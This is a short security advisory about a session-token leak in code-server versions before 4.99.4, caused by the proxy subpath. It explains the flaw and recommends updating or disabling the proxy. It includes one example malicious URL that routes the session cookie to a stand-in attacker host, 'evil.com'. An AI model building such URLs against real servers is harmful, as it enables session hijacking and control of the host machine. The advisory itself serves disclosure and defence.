Code-Asher

**Name of the Vulnerable Software and Affected Versions** code-server versions prior to 4.99.4 **Description** The issue allows an attacker to gain access to the session token through a maliciously crafted URL using the proxy subpath. This can result in the attacker proxying to an arbitrary domain, potentially exfiltrating a user's session token. The malicious URL, for example `https://<code-server>/proxy/test@evil.com/path`, would be proxied to `test@evil.com/path`. With access to the session cookie, the attacker can log into code-server and have full access to the machine hosting code-server as the user running code-server. **Recommendations** For versions prior to 4.99.4, update to version 4.99.4 to resolve the issue. As a temporary workaround, consider disabling the built-in proxy until a patch is available. Restrict access to the proxy subpath to minimize the risk of exploitation. Avoid clicking on maliciously crafted links that reference the /proxy subpath in code-server instances.